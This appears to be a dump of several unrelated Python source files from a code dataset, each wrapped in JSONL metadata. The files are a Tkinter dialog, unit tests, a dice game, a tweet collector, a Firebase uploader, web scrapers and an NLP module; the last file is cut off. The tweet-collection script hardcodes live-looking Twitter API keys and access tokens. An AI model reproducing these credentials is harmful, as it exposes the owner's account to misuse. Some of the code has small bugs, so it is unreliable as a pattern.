pre_scores/t\r\n","sub_path":"IDK.py","file_name":"IDK.py","file_ext":"py","file_size_in_byte":3740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"342022796","text":"'''\nCreated on 27.04.2013\n\n@author: user\n'''\n\nimport os, copy\nfrom Tkinter import Tk, Menu, Frame, Text, Scrollbar, Toplevel\nfrom Tkconstants import N, E, S, W, HORIZONTAL, VERTICAL\nfrom ttk import Treeview\nimport tkFileDialog\n\nfrom lib.books.tableofcontents import parse_toc_text\nfrom lib.pytools import encodings\n\nclass TOCImportDialog(Toplevel): \n \n def __init__(self, master, **args): \n '''\n init's TOCImportDialog\n \n @param args: delimiter1, delimiter2, encoding, linechar \n '''\n self.__master = master\n self.__config = {}\n self.__config[\"delimiter1\"] = args.pop(\"delimiter1\", \" \")\n self.__config[\"delimiter2\"] = args.pop(\"delimiter2\", \" \")\n self.__config[\"encoding\"] = args.pop(\"encoding\", \"UTF-8\")\n self.__config[\"linechar\"] = args.pop(\"linechar\", \".\")\n \n self.__orglines = []\n self.__toc = []\n \n if args.has_key(\"filename\"):\n if os.access(args[\"filename\"], os.F_OK & os.R_OK):\n f = open(args[\"filename\"])\n self.__orglines = f.readlines()\n f.close()\n \n self.init_tk()\n \n \n def init_tk(self):\n Toplevel.__init__(self, self.__master)\n self.columnconfigure(0, weight=1)\n self.rowconfigure(0, weight=1)\n \n self.init_menu()\n \n tvframe = Frame(self)\n tvframe.grid(column=0, row=0, sticky=N+E+S+W)\n tvframe.columnconfigure(0, weight=1)\n tvframe.rowconfigure(0, weight=1)\n \n self.Treeview = Treeview(tvframe)\n self.Treeview.grid(column=0, row=0, sticky=N+E+S+W)\n self.TvYScrollbar = Scrollbar(tvframe, orient=VERTICAL, command=self.Treeview.yview)\n self.TvYScrollbar.grid(column=1, row=0, sticky=N+S)\n self.TvXScrollbar = Scrollbar(tvframe, orient=HORIZONTAL, command=self.Treeview.xview)\n self.TvXScrollbar.grid(column=0, row=1, sticky=E+W)\n self.Treeview.config(yscrollcommand=self.TvYScrollbar.set)\n self.Treeview.config(xscrollcommand=self.TvXScrollbar.set)\n \n self.Treeview.bind(\"<>\", self.action_tv_select)\n \n txtframe = Frame(self)\n txtframe.grid(column=1, row=0, sticky=N+E+S+W)\n txtframe.columnconfigure(0, weight=1)\n txtframe.rowconfigure(0, weight=1)\n \n self.Text = Text(txtframe)\n self.Text.grid(column=0, row=0, sticky=N+E+S+W)\n self.TxtYScrollbar = Scrollbar(txtframe, orient=VERTICAL, command=self.Text.yview)\n self.TxtYScrollbar.grid(column=1, row=0, sticky=N+S)\n self.TxtXScrollbar = Scrollbar(txtframe, orient=HORIZONTAL, command=self.Text.xview)\n self.TxtXScrollbar.grid(column=0, row=1, sticky=E+W)\n self.Text.config(yscrollcommand=self.TxtYScrollbar.set)\n self.Text.config(xscrollcommand=self.TxtXScrollbar.set)\n \n tvcmdframe = Frame(self)\n tvcmdframe.grid(column=0, row=1)\n \n txtcmdframe = Frame(self)\n txtcmdframe.grid(column=1, row=1)\n \n \n def init_menu(self):\n menubar = Menu(self)\n #file menu\n filemenu = Menu(menubar, tearoff=0)\n filemenu.add_command(label=\"New\", command=self.action_filemenu_new)\n filemenu.add_command(label=\"Open\", command=self.action_filemenu_open)\n filemenu.add_command(label=\"Save\", command=self.action_filemenu_save)\n filemenu.add_command(label=\"Save as\", command=self.action_filemenu_saveas)\n filemenu.add_separator()\n filemenu.add_command(label=\"Cancel\", command=self.action_filemenu_cancel)\n filemenu.add_command(label=\"Return\", command=self.action_filemenu_return)\n menubar.add_cascade(label=\"File\", menu=filemenu)\n #edit menu\n editmenu = Menu(menubar, tearoff=0)\n editmenu.add_command(label=\"Update Tree\", command=self.action_editmenu_update)\n editmenu.add_command(label=\"Reset Text\", command=self.action_editmenu_reset)\n editmenu.add_separator()\n editmenu.add_command(label=\"Setup\", command=self.action_editmenu_setup)\n menubar.add_cascade(label=\"Edit\", menu=editmenu)\n #help menu\n helpmenu = Menu(menubar, tearoff=0)\n helpmenu.add_command(label=\"About\", command=self.action_helpmenu_about)\n menubar.add_cascade(label=\"Help\", menu=helpmenu)\n #self.TreeFont=\n self.config(menu=menubar)\n \n \n def action_tv_select(self, event):\n s = self.Treeview.selection()\n self.__selection = int(s[0])\n \n def action_filemenu_new(self):\n pass\n \n \n def action_filemenu_open(self):\n #open dialog\n s_filename = tkFileDialog.askopenfilename(filetypes=[(\"text file\",\"*.txt\"),(\"all files\",\"*.*\")], title=\"open a file\")\n #if dialog was canceled\n if s_filename == \"\":\n return\n f = open(s_filename)\n self.__orglines = f.readlines()\n f.close()\n self.reset_lines()\n \n def action_filemenu_save(self):\n pass\n \n \n def action_filemenu_saveas(self):\n pass\n \n \n def action_filemenu_cancel(self):\n self.__toc = []\n self.quit_application()\n \n \n def action_filemenu_return(self):\n self.quit_application()\n\n \n def action_editmenu_update(self):\n self.update_treeview(self.Text.get(\"1.0\", \"end\"))\n \n \n def action_editmenu_reset(self):\n self.reset_lines()\n \n \n def action_editmenu_setup(self):\n pass\n \n \n def action_helpmenu_about(self):\n pass\n \n \n def run_application(self):\n self.reset_lines()\n self.mainloop()\n \n def quit_application(self):\n self.destroy()\n \n def get_toc(self):\n return copy.deepcopy(self.__toc)\n \n def reset_lines(self):\n self.Text.delete(\"1.0\", \"end\")\n for line in self.__orglines:\n self.Text.insert(\"end\", line)\n \n \n def update_treeview(self, s_text):\n \n self.__toc = parse_toc_text(s_text, **self.__config)\n \n self.Treeview.delete(*self.Treeview.get_children())\n \n for row in self.__toc:\n #encodings.print_encoded(u\"%s > %s\" % (row[\"chapter_number\"], row[\"chapter_name\"]))\n s_chpnum = row[\"chapter_number\"].encode(self.__config[\"encoding\"])\n s_chpname = row[\"chapter_name\"].encode(self.__config[\"encoding\"])\n self.Treeview.insert(\"\", \"end\", iid=row[\"rid\"], text=str(\"%s > %s\" % (s_chpnum, s_chpname)) )\n \n for row in self.__toc:\n self.Treeview.set_children(row[\"rid\"], *row[\"clds\"])\n \n\ndef test():\n app = Tk()\n dlg = TOCImportDialog(app, filename=\"TOCImportDialog_test.txt\")\n app.wait_window(dlg)\n res = dlg.get_toc()\n app.quit()\n print(res)\n \n \nif __name__ == '__main__':\n test()","sub_path":"plx/lib/tkwidgets/TOCImportDialog.py","file_name":"TOCImportDialog.py","file_ext":"py","file_size_in_byte":6941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"158433442","text":"# -*- coding: UTF-8 -*-\n\nfrom unittest import TestCase, TestProgram\n\nfrom junit import junit_main\nfrom os.path import devnull\nfrom platform import uname\n\nclass T(TestCase):\n def test(self):\n expected = expected_by_os(),\n got = tuple(junit_main('-b,,-l,'.split(','), simulate_bad_call=True))\n self.assertEquals(expected, got)\n\ndef expected_by_os():\n if devnull == '/dev/null':\n return '[Errno 13] Permission denied'\n u = uname()[0]\n if u == 'Windows':\n return u'[Error 2] 指定されたファイルが見つかりません。'\n raise Exception(u)\n\nif __name__ == '__main__':\n TestProgram()\n","sub_path":"last-dropbox/junit.py/test02junitmain.py","file_name":"test02junitmain.py","file_ext":"py","file_size_in_byte":643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"519620347","text":"import random\n\n\nclass Player:\n\n def __init__(self, max_rolls):\n self.max_rolls = max_rolls\n\n def roll(self):\n return random.randint(1, 6)\n\n def hold(self):\n return False\n\n\nclass Game:\n\n def __init__(self, player):\n self.player = player\n self.total_score = 0\n self.rounds = 7\n\n def round(self):\n round_total = 0\n roll_num = 0\n while roll_num < self.player.max_rolls:\n roll_num += 1\n roll = self.player.roll()\n if roll > 1:\n round_total += roll\n else:\n round_total = 0\n break\n print(round_total)\n return round_total\n\n def play_game(self):\n\n while self.rounds > 1:\n self.total_score += self.round()\n self.rounds -= 1\n\n print(self.total_score)\n return self.total_score\n\nplayer = Player(2)\ngame = Game(player)\ngame.play_game()\n","sub_path":"some_pig.py","file_name":"some_pig.py","file_ext":"py","file_size_in_byte":949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"458066991","text":"# Copyright (C) 2017 Google Inc.\n# Licensed under http://www.apache.org/licenses/LICENSE-2.0 \n\n\"\"\"Test Access Control List\"\"\"\n\nfrom ggrc import db\nfrom ggrc.models import all_models\nfrom integration.ggrc import TestCase\nfrom integration.ggrc.models import factories\nfrom integration.ggrc.api_helper import Api\nfrom integration.ggrc.generator import ObjectGenerator\n\n\nclass TestAccessControlRBAC(TestCase):\n \"\"\"TestAccessControlRBAC tests if users get correct permissions on objects\n from the access control table\"\"\"\n\n def setUp(self):\n super(TestAccessControlRBAC, self).setUp()\n self.api = Api()\n self.set_up_people()\n self.set_up_acl_object()\n\n def set_up_people(self):\n \"\"\"Set up people with different roles needed by the tests\"\"\"\n self.people = {}\n object_generator = ObjectGenerator()\n\n for name in [\"Creator\", \"Reader\", \"Editor\"]:\n _, user = object_generator.generate_person(\n data={\"name\": name}, user_role=name)\n self.people[name] = user\n\n def set_up_acl_object(self):\n \"\"\"Set up a control with an access control role that grants RUD\"\"\"\n self.control = factories.ControlFactory()\n self.all_acr = factories.AccessControlRoleFactory(\n object_type=\"Control\",\n read=True,\n update=True,\n delete=True\n )\n for name in [\"Creator\", \"Reader\", \"Editor\"]:\n factories.AccessControlListFactory(\n object=self.control,\n ac_role_id=self.all_acr.id,\n person=self.people.get(name)\n )\n\n def test_acl_object_cru(self):\n \"\"\"Test if readers/creators can CRUD an object with all permissions\"\"\"\n control_id = self.control.id\n # role_id = self.all_acr.id\n for name in (\"Creator\", \"Reader\", \"Editor\"):\n person = self.people.get(name)\n role_id = self.all_acr.id\n db.session.add(person)\n self.api.set_user(person)\n response = self.api.get(all_models.Control, control_id)\n assert response.status_code == 200, \\\n \"{} cannot GET object from acl. Received {}\".format(\n name, response.status)\n acl = response.json[\"control\"][\"access_control_list\"]\n assert len(response.json[\"control\"][\"access_control_list\"]) == 3, \\\n \"ACL in control does not include all people {}\".format(acl)\n\n assert acl[0].get(\"ac_role_id\", None) == role_id, \\\n \"ACL list does not include role id {}\".format(acl)\n","sub_path":"test/integration/ggrc/access_control/test_ac_rbac.py","file_name":"test_ac_rbac.py","file_ext":"py","file_size_in_byte":2405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"407229836","text":"# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------------\n# get_tweets.py\n# Description: Streams Twitter's API to recover tweets\n# ---------------------------------------------------------------------------\n\nimport tweepy\nimport csv\n\nckey = 'ApZ6PJFWxmX3C3w35leJREmIV'\ncsecret = 'KxrmUH2fzEYtWDZ0o1HzZl8WekFr1T0hOzv3keXbv6D3u179DV'\natoken = '3401879230-ImZvLr7uPrBsvHDzAitsLuSzgda0ZfJ2l1WYBg0'\nasecret = 'VIVs8KTr2dikl9k8N7IMrcfB0sh07XdkWP132eB1Jg4SU'\n\nauth = tweepy.OAuthHandler(ckey, csecret)\nauth.set_access_token (atoken, asecret)\n\napi = tweepy.API(auth, wait_on_rate_limit=True,\n\t\t\t\t wait_on_rate_limit_notify=True)\n \nif (not api):\n print (\"Can't Authenticate\")\n sys.exit(-1)\n\n\n# this is what we're searching for\nsearchQuery = 'Bring Bernie Back' \nlatlongs = '38.9072,-77.0369,20000mi' # location of the tweets\nlanguage = 'en' # language of tweets\nsearchtype = 'recent' # type of tweet search, could be recent, popular, or mixed\nentitiesin = 'false' # include or not some entities such as videos, images, urls in the tweets\nmaxTweets = 10000 # Some arbitrary large number\ntweetsPerQry = 1000 # this is the max the API permits\nfName = 'bernie2016tweets.csv' # We'll store the tweets in a csv file.\n\n\n# If results from a specific ID onwards are reqd, set since_id to that ID.\n# else default to no lower limit, go as far back as API allows\nsinceId = None\n\n# If results only below a specific ID are, set max_id to that ID.\n# else default to no upper limit, start from the most recent tweet matching the search query.\n# Choose some arbitrary VERY large number if you don't have a limit for the max_id\nmax_id = 1080402812358389000\n\ntweetCount = 0\nprint(\"Downloading max {0} tweets\".format(maxTweets))\nwhile tweetCount < maxTweets:\n try:\n if (max_id <= 0):\n if (not sinceId):\n new_tweets = api.search(q=searchQuery, count=tweetsPerQry, lang=language, geocode=latlongs, include_entities=entitiesin, result_type=searchtype)\n else:\n new_tweets = api.search(q=searchQuery, count=tweetsPerQry,\n since_id=sinceId, lang=language, geocode=latlongs, include_entities=entitiesin, result_type=searchtype)\n else:\n if (not sinceId):\n new_tweets = api.search(q=searchQuery, count=tweetsPerQry,\n max_id=str(max_id - 1), lang=language, geocode=latlongs, include_entities=entitiesin, result_type=searchtype)\n else:\n new_tweets = api.search(q=searchQuery, count=tweetsPerQry,\n max_id=str(max_id - 1),\n since_id=sinceId, lang=language, geocode=latlongs, include_entities=entitiesin, result_type=searchtype)\n if not new_tweets:\n print(\"No more tweets found\")\n break\n\n # Specify the output of csv \n writer = csv.writer(open(fName, 'a'))\n \n for tweet in new_tweets:\n tweetid = tweet.id\n tweettext = tweet.text.encode('ascii', 'ignore')\n tweettime = tweet.created_at\n userlocation = tweet.user.location.encode('ascii', 'ignore')\n retweets = tweet.retweet_count\n line = [tweetid, tweettext, tweettime, userlocation, retweets]\n writer.writerow(line)\n \n tweetCount += len(new_tweets)\n print(\"Downloaded {0} tweets\".format(tweetCount))\n max_id = new_tweets[-1].id\n except tweepy.TweepError as e:\n # Just exit if any error\n print(\"some error : \" + str(e))\n break\n\nprint (\"Downloaded {0} tweets, Saved to {1}\".format(tweetCount, fName))\n\n","sub_path":"GetTweets.py","file_name":"GetTweets.py","file_ext":"py","file_size_in_byte":3856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"342046972","text":"#DEPRECATED REMOVE.\nimport pyrebase\nfrom collections import defaultdict\nimport calendar\nimport time\n\nimport dfsapi\nimport iassorter\nimport fbread\nfrom match import Match\n\n'''\nReads the instructors and institutions from the firebase database\nin the most recent timestamp under the specified program.\nMatches instructors to institutions and stores the matches\nby creating a recent timestamp under the matches tab under the specified program.\n'''\ndef upload_matches(program:str):\n\tinstructors = fbread.read_instructors(program)\n\tinstitutions = fbread.read_institutions(program)\n\n\tif instructors == False:\n\t\treturn False\n\tif institutions == False:\n\t\treturn False\n\n\tresult = iassorter.sort(instructors, institutions)\n\n\ttimestamp = str(calendar.timegm(time.gmtime()))\n\tdb = dfsapi.get_db()\n\n\tkeys = db.child(program).child(\"matches\").shallow().get()\n\tif keys.val() != None:\n\t\tdb_length = len(keys.val())\n\t\tif db_length > 10:\n\t\t\toldest = min(keys.val())\n\t\t\tdb.child(program).child(\"matches\").child(oldest).remove()\n\t\t\tprint(\"Here\")\n\n\tjson_matches = defaultdict(list)\n\n\tfor school in result:\n\t\tfor match in result[school]:\n\t\t\tmatch_dict = match_to_dict(match)\n\t\t\tjson_matches[school].append(match_dict)\n\t\t\tdb.child(program).child(\"matches\").child(timestamp).child(school).child(match.teacher_name).set(match_dict)\n\t\t\tdb.child(program).child(\"matches\").child(timestamp).child(school).child(match.teacher_name).update({\"Locked\":False})\n\n\treturn json_matches\n\n'''\nConverts match objects into a dictionary with information\nof both the instructor and institution.\n'''\ndef match_to_dict(match : Match) -> dict:\n\tmatch_dict = {\"TeacherName\" : match.teacher_name,\n\t\t\"SchoolName\" : match.school_name,\n\t\t\"Region\" : match.region,\n\t\t\"PreviousMentor\" : match.previous_mentor,\n\t\t\"Car\" : match.car,\n\t\t\"Languages\" : match.languages,\n\t\t\"MultipleDays\" : match.multiple_days,\n\t\t\"Schedule\" : match.schedule,\n\t\t\"Locked\" : match.locked,\n\t\t\"Instructors\" : match.instructors,\n\t\t\"Gender\" : match.gender,\n\t\t\"University\" : match.university,\n\t\t\"Year\" : match.year,\n\t\t\"Ethnicity\" : match.ethnicity,\n\t\t\"SchoolAddress\" : match.school_address,\n\t\t\"SchoolCounty\" : match.school_county,\n\t\t\"TeacherSchedule\" : match.teacher_schedule,\n\t\t\"ShirtSize\" : match.shirtsize\n\t}\n\treturn match_dict\n","sub_path":"server/src/fbstoresort.py","file_name":"fbstoresort.py","file_ext":"py","file_size_in_byte":2244,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"208626158","text":"from selenium import webdriver\r\nfrom bs4 import BeautifulSoup\r\nimport time\r\nimport csv\r\nimport requests\r\nstarturl = 'https://en.wikipedia.org/wiki/List_of_brown_dwarfs'\r\nbrowser = webdriver.Chrome('/Users/Poonam/OneDrive/Desktop/My Python/chromedriver')\r\nbrowser.get(starturl)\r\ntime.sleep(10)\r\nheaders = ['name','light_years_from_earth','planet_mass','stellar_magnitude','discovery_date','hyperlink','planet_type','planet_radius','orbital_radius','orbital_period','eccentricity']\r\nplanetdata = []\r\nnewplanetdata = []\r\ndef scrape():\r\n for i in range(1,433):\r\n while True:\r\n time.sleep(2)\r\n soup = BeautifulSoup(browser.page_source,'html.parser')\r\n currentpagenumber = int(soup.find_all('input',attrs = ['class','page_num'])[0].get('value'))\r\n if currentpagenumberi:\r\n browser.find_element_by_xpath('//*[@id=\"primary_column\"]/footer/div/div/div/nav/span[1]/a').click()\r\n else:\r\n break\r\n for ul_tag in soup.find_all('ul',attrs = {'class','exoplanet'}):\r\n li_tags = ul_tag.find_all('li')\r\n templist = []\r\n for index,li_tag in enumerate(li_tags):\r\n if index == 0:\r\n templist.append(li_tag.find_all('a')[0].contents[0])\r\n else:\r\n try:\r\n templist.append(li_tag.contents[0])\r\n except:\r\n templist.append('')\r\n hyperlinktag = li_tags[0]\r\n templist.append('https://en.wikipedia.org/wiki/List_of_brown_dwarfs'+hyperlinktag.find_all('a',href = True)[0]['href'])\r\n planetdata.append(templist)\r\n browser.find_element_by_xpath('https://en.wikipedia.org/wiki/List_of_brightest_stars_and_other_record_stars').click()\r\n print(f'{i}pagedone')\r\ndef scrapemoredata(hyperlink):\r\n try:\r\n page = request.get(hyperlink)\r\n soup = BeautifulSoup(page.content,'html.parser')\r\n templist = []\r\n for tr_tag in soup.find_all('tr',attrs = {'class':'fact_row'}):\r\n td_tags = tr_tag.find_all('td')\r\n for td_tag in td_tags:\r\n try:\r\n templist.append(td_tag.find_all('div',attrs = {'class':'value'})[0].contents[0])\r\n except:\r\n templist.append('')\r\n newplanetdata.append(templist)\r\n except:\r\n time.sleep(1)\r\n scrapemoredata(hyperlink)\r\nscrape()\r\nfor index,data in enumerate(planetdata):\r\n scrapemoredata(data[5])\r\n print(f'{index+1}pagedone2')\r\nfinalplanetdata = []\r\nfor index,data in enumerate(planetdata):\r\n newplanetdataelement = newplanetdata[index]\r\n newplanetdataelement = [elem.replace('\\n','')for elem in newplanetdataelement]\r\n newplanetdataelement = newplanetdataelement[:7]\r\n finalplanetdata.append(data+newplanetdataelement)\r\nwith open('final2.csv','w') as f:\r\n csvwriter = csv.writer(f)\r\n csvwriter.writerow(headers)\r\n csvwriter.writerows(finalplanetdata)","sub_path":"Scraper.py","file_name":"Scraper.py","file_ext":"py","file_size_in_byte":3172,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"358814781","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport time\nimport os\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0\"\nimport torch\nfrom new_dataset import myDataset, trainSearchDataset\nimport random\nfrom new_scoreAgent import scoreEvaluator_with_train\nfrom new_utils import render\nimport skimage\nfrom drn import drn_c_26\n\ndata_folder = '/local-scratch/fuyang/cities_dataset'\nbeam_width = 6\nbeam_depth = 10\nis_visualize = False\nis_save = True\nsave_path = '/local-scratch/fuyang/result/beam_search_v2/without_search_weak_constraint/'\nmax_epoch = 100\nedge_bin_size = 36\nbatch_size = 16\nphase = 'valid'\nedge_strong_constraint = False\n\ntrain_dataset = trainSearchDataset(data_folder, data_scale=1., phase=phase,\n edge_strong_constraint=edge_strong_constraint)\n\ntrain_loader = torch.utils.data.DataLoader(train_dataset,\n batch_size=1,\n shuffle=False,\n num_workers=1,\n drop_last=True)\n\n# evaluator_train is used for training\n# evaluator_search is used for searching\n# separate into two modules in order to use multiple threads to accelerate\nevaluator_train = scoreEvaluator_with_train('/local-scratch/fuyang/cities_dataset',\n backbone_channel=64, edge_bin_size=edge_bin_size)\n\nevaluator_train.to('cuda:0')\nevaluator_train.eval()\nevaluator_train.load_weight(save_path, '10')\n\nmean = [0.485, 0.456, 0.406]\nstd = [0.229, 0.224, 0.225]\n\n\ndef test(dataset, model, edge_bin_size):\n correct = 0\n total = 0\n model.eval()\n order = list(range(len(dataset)))\n for count, idx in enumerate(order):\n data = dataset.database[idx]\n name = data['name']\n print(name)\n corners = data['corners']\n edges = data['edges']\n corner_false_id = data['corner_false_id']\n edge_false_id = data['edge_false_id']\n\n img = skimage.img_as_float(plt.imread(os.path.join(data_folder, 'rgb', name+'.jpg')))\n #img = skimage.transform.rescale(img, self.data_scale, multichannel=True)\n img = img.transpose((2,0,1))\n img = (img - np.array(mean)[:, np.newaxis, np.newaxis]) / np.array(std)[:, np.newaxis, np.newaxis]\n\n mask = render(corners, edges, render_pad=-1)\n\n ### corner ###\n corner_gt_mask = render(corners[corner_false_id], np.array([]), render_pad=0)[1]\n\n ### edge ###\n edge_gt_mask = render(corners, edges[edge_false_id], render_pad=-1)\n edge_gt_mask = np.concatenate((edge_gt_mask, np.zeros((1,256,256))), 0).transpose((1,2,0))\n edge_input_masks = []\n for edge_i in range(edges.shape[0]):\n edge_input_masks.append(render(corners, edges[[edge_i]],render_pad=-1)[0:1][np.newaxis, ...])\n edge_input_masks = np.concatenate(edge_input_masks, 0)\n\n img = torch.FloatTensor(img).unsqueeze(0)\n mask = torch.FloatTensor(mask).unsqueeze(0)\n edge_input_masks = torch.FloatTensor(edge_input_masks)\n\n img = img.to(model.device)\n mask = mask.to(model.device)\n edge_input_masks = edge_input_masks.to(model.device)\n\n with torch.no_grad():\n img_volume = model.imgvolume(img)\n corner_pred = model.cornerEvaluator(mask, img_volume)\n edge_pred = model.edgeEvaluator(edge_input_masks,\n mask.expand(edge_input_masks.shape[0],-1,-1,-1),\n img_volume.expand(edge_input_masks.shape[0],-1,-1,-1),\n corner_pred.expand(edge_input_masks.shape[0],-1,-1,-1),\n torch.zeros(edge_input_masks.shape[0], edge_bin_size, device=model.device))\n\n # vis\n gt_data = train_dataset.ground_truth[name]\n gt_mask = render(gt_data['corners'], gt_data['edges'])\n gt_mask = np.concatenate((gt_mask, np.zeros((1,256,256))),0).transpose((1,2,0))\n\n corner_pred = corner_pred.cpu().numpy()\n edge_pred = edge_pred.cpu().numpy()\n edge_pred = np.exp(edge_pred) / np.exp(edge_pred).sum(1, keepdims=True)\n mask = mask.cpu().numpy()\n\n corner_pred = corner_pred[0,0]\n pred = []\n for edge_i in range(edge_pred.shape[0]):\n if edge_pred[edge_i, 1] > 0.7:\n pred.append(edge_i)\n\n edge_result = render(corners, edges[pred], render_pad=-1)\n edge_result = np.concatenate((edge_result, np.zeros((1,256,256))), 0).transpose((1,2,0))\n\n mask = np.concatenate((mask[0], np.zeros((1,256,256))), 0).transpose((1,2,0))\n corner_gt_mask = corner_gt_mask\n\n # metric\n total += edges.shape[0]\n for edge_i in range(edges.shape[0]):\n if edge_i in edge_false_id and edge_i in pred:\n correct += 1\n elif edge_i not in edge_false_id and edge_i not in pred:\n correct += 1\n\n\n # vis\n plt.figure(figsize=(6.4, 3.9))\n img = skimage.img_as_float(plt.imread(os.path.join(data_folder, 'rgb', name+'.jpg')))\n plt.subplot(2,4,1)\n plt.imshow(img)\n plt.subplot(2,4,2)\n plt.imshow(mask)\n plt.subplot(2,4,3)\n plt.imshow(gt_mask)\n plt.subplot(2,4,4)\n plt.imshow(corner_pred)\n plt.title('corner')\n plt.subplot(2,4,5)\n plt.imshow(corner_gt_mask)\n plt.title('corner gt')\n plt.subplot(2,4,6)\n plt.imshow(edge_result)\n plt.title('edge')\n plt.subplot(2,4,7)\n plt.imshow(edge_gt_mask)\n plt.title('edge gt')\n #plt.subplots_adjust(wspace=0.1, hspace=0.1)\n plt.show()\n #plt.savefig(os.path.join(phase, str(count)+'.jpg'), dpi=300)\n plt.close()\n\n print(correct / total)\n\n\ntest(train_dataset, evaluator_train, edge_bin_size)\n\n# iter valid train\n# 1 0.63 0.61\n# 2 0.70 0.74\n# 5 0.72 0.81\n# 10 0.74 0.88\n# 17 0.74 0.93\n# 30 0.75 0.96","sub_path":"new_scoreAgent_test.py","file_name":"new_scoreAgent_test.py","file_ext":"py","file_size_in_byte":6048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"523857964","text":"#!/usr/bin/python\n# -*- coding:UTF-8 -*-\n\n################################################################################\n#\n# Copyright 2010-2014 Carlos Ramisch, Vitor De Araujo, Silvio Ricardo Cordeiro,\n# Sandra Castellanos\n#\n# mweoccur.py is part of mwetoolkit\n#\n# mwetoolkit is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# mwetoolkit is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with mwetoolkit. If not, see .\n#\n################################################################################\n\"\"\"\nThis module provides the `MWEOccurrence` class. This class represents an\noccurrence of an MWE `Candidate` inside a `Sentence`.\n\"\"\"\n\n################################################################################\n\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\nfrom __future__ import absolute_import\n\n\n\nclass MWEOccurrence(object):\n r\"\"\"Represents the occurrence of an MWE candidate in a sentence.\n\n Constructor Arguments:\n @param sentence The sentence in this occurrence.\n @param candidate The MWE candidate in this occurrence.\n @param indexes A list of indexes that represent the position of\n each word from `self.candidate` in `self.sentence`.\n This list will be `list(xrange(i, i + len(self.candidate)))` when\n referring to the simplest kinds of MWEs. If the MWE in-sentence has\n different word order (e.g. passive voice in English), a permutation of\n those indexes will be used. If there are gaps inside the MWE (e.g.\n verb-particle compounds in English), other sentence indexes may be used.\n IMPORTANT: This list is 0-based in python but 1-based in XML.\n\n Examples:\n Today , a demo was given Sentence\n ~ ~~~~ ~~~~~ Candidate = \"give a demo\"\n _ _ 2 3 _ 5 indexes = [5, 2, 3]\n\n The old man kicked the proverbial bucket Sentence\n ~~~~~~ ~~~ ~~~~~~ Candidate = \"kick the bucket\"\n _ _ _ 3 4 _ 6 indexes = [3, 4, 6]\n \"\"\"\n def __init__(self, sentence, candidate, sentence_indexes):\n for s_i in sentence_indexes:\n if not (0 <= s_i < len(sentence)):\n raise Exception(\"Candidate %r references bad word \" \\\n \"index: Sentence %r, index %r.\" % (\n candidate.id_number, sentence.id_number, s_i+1))\n self.candidate = candidate\n self.sentence = sentence\n self.indexes = sentence_indexes\n\n def to_xml(self):\n ret = ['')\n # For each (candidate index, sentence index)...\n for c_i, s_i in enumerate(self.indexes):\n ret.append('')\n #ret.append(self.sentence[s_i].lemma_or_surface())\n #ret.append('')\n ret.append(\"\")\n return ''.join(ret)\n\n################################################################################\n\nclass MWEOccurrenceBuilder(object):\n r\"\"\"MWEOccurrenceBuilder's can be filled up with data\n to create an instance of MWEOccurrence.\n\n Constructor Arguments:\n @param sentence Will become `MWEOccurrence.sentence`.\n @param candidate Will become `MWEOccurrence.candidate`.\n @param n_gaps Number of remaining gaps allowed inside\n the indexes of the MWEOccurrence (see `fill_next_slot`) .\n \n Attributes:\n @param indexes Will become `MWEOccurrence.indexes`.\n \"\"\"\n def __init__(self, sentence, candidate, n_gaps=None):\n self.sentence = sentence\n self.candidate = candidate\n self.n_gaps = n_gaps or 0\n self.indexes = [] # similar to JMWE's `MWEBuilder.slot`\n\n def is_full(self):\n r\"\"\"Return whether the builder is ready to create an MWEOccurrence.\"\"\"\n # Similar to JMWE's `MWEBuilder.isFull`.\n assert len(self.indexes) <= len(self.candidate)\n return len(self.indexes) == len(self.candidate)\n\n def match_key(self, word_obj):\n r\"\"\"Return some `key(word_obj)` for comparison at `self.match`.\"\"\"\n raise NotImplementedError\n\n def match(self, index_sentence, index_candidate):\n r\"\"\"Return whether we should fill position\n `index_candidate` with the word in `index_sentence`.\"\"\"\n # Similar to JMWE's `IMWEDesc.isFillerForSlot`.\n s_word = self.sentence[index_sentence]\n c_word = self.candidate[index_candidate]\n return self.match_key(s_word) == self.match_key(c_word)\n\n def fill_next_slot(self, index_sentence):\n r\"\"\"Try the following things, in order:\n -- If possible to fill next index slot, do it by\n appending an index from sentence to this builder\n and return non-False \"FILLED\".\n -- If possible to insert a gap, ignore this index\n and return non-False \"GAP\".\n -- Return False.\n \"\"\"\n # Similar to JMWE's `MWEBuilder.fillNextSlot`.\n assert index_sentence < len(self.sentence)\n index_candidate = len(self.indexes)\n if self.is_full():\n return False # Cannot match anything else\n if self.match(index_sentence, index_candidate):\n self.indexes.append(index_sentence)\n return \"FILLED\"\n if self.n_gaps > 0 and index_candidate != 0:\n self.n_gaps -= 1\n return \"GAP\"\n return False\n\n def checked_fill_next_slot(self, index_sentence):\n r\"\"\"Call `fill_next_slot` and raise if it returns False.\"\"\"\n if not self.fill_next_slot(index_sentence):\n raise Exception(\"Unable to fill next slot!\")\n\n def create(self):\n r\"\"\"Create an MWEOccurrence object.\"\"\"\n if not self.is_full():\n raise Exception(\"MWEOccurrence not ready to be created\")\n return MWEOccurrence(self.sentence, self.candidate, self.indexes)\n \n def 